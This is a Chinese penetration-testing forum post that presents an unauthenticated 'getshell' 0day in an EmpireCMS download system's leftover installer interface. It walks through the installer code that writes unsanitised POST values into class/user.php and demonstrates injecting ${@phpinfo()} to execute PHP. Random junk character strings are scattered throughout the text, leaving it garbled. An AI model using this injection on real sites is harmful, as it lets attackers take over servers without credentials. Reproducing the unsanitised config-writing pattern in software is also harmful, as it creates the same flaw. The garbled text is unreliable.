中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]
作者: admin    时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们. ^7 _  S* V) G! c  l) j

  a6 N* {+ x; q' P. o


% u. e9 z7 c- Y% U5 q( x这是帝国的一套下载系统 如图8 \( \7 [! s; N) h2 ~
ps(不需要任何账户和密码,直接写shell)

0 b' l: ~, x# I- }2 w5 d

由于很多站是由于下载要整合discuz 等等一些论坛....) O/ @5 v- o" \9 s


0 P$ {: Y! s* q% {# ?9 n3 \, I

而帝国他又有一个万能接口,如图


5 m- \! t% f/ P7 ?; z3 _  S[attach]170[/attach]- v' `& b5 Q9 |+ f* {$ X
9 s. ]# A+ W6 B

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
) a* G6 J) a7 f" y1 _$ w" d7 @
- `2 j& u+ S. B0 i6 [) I当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
5 m* \  h: Q/ u" P' N5 _* P6 o% S. S: ?+ C5 u
在data/fun.php中的15行
2 `* M* S- Z; s6 g
% W, y! A& P* _+ x我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
. p) G, s  e, \/ O
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干  m+ R" c0 t: f3 f5 i4 b" w- |

6 h1 L7 e, i2 |- D" Z; v7 X这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
  R4 k% C: X& G- f: T: C4 Z; _! P' k
, J% r& G: |! C, L! o& z) t0 n他将传进来的变量进行了切割,然后赋给了$filetext
: _' |! L" C+ G+ E( e1 c% G5 P4 @: X2 @: K1 H9 D
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
2 M& l! \% q/ E1 P& E, v9 s  t8 v1 V0 v' W$ L& F
我们看看写入的结果,随便填一个

- V. I" P1 J% v! R# d0 `7 O
[attach]171[/attach]) G. e1 l( b& k; u9 I9 Q5 O

+ J/ K1 `( j5 z$ o9 \. ]9 ]2 L; H3 p0 C5 j  X
[attach]172[/attach]
6 G0 k( b7 z. _. Y/ s3 d6 H6 c6 p* b/ x. m5 M/ R  o0 h( y2 C1 `1 ?9 c* j
+ R9 G1 r0 \& M# y) I; r
& v6 `# N8 v% ~  H; E" Q

/ J  h8 M, n; s1 p1 U% }2 i; J/ X
$ C/ i# [; `7 p8 }0 T7 z( y6 Y; K5 ~0 K$ V

) d+ D; ^* W  \( w! }( ?. ~( |1 J4 U: V
! J7 U0 N/ g  O& j2 ?1 K; e
[attach]173[/attach]0 B& A- K( U2 w5 u

) o$ c3 I5 h$ d# X8 a+ E# U7 e( A2 f; h4 l) u
8 W( E# @: K$ ]
  ]- |. a# F6 H8 f$ y2 j' R9 G2 m
" J+ y7 r3 ^* O  b- r. E8 C
[attach]174[/attach]
, H  u5 d, g2 Z: D- r
% f7 a1 @2 y7 \" |4 F5 V, E9 m

所以我们淫荡点,写个${@phpinfo()}试试


# ~) k) N1 V8 r

然后访问以下class/user.php这个文件
: @: ]7 _/ v5 L* l3 m6 n, P8 J日了吧

' ~' w# u% F* ?  F- G

( t, f( d/ G6 N9 g5 Z. c6 W! b) _5 D2 p% x3 E. N, {: G
( }- ]( q- P% n4 o3 Q
# A% @& `! E6 c" E  A
' O% K# l  Y8 p! a! i. T9 Y' a




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2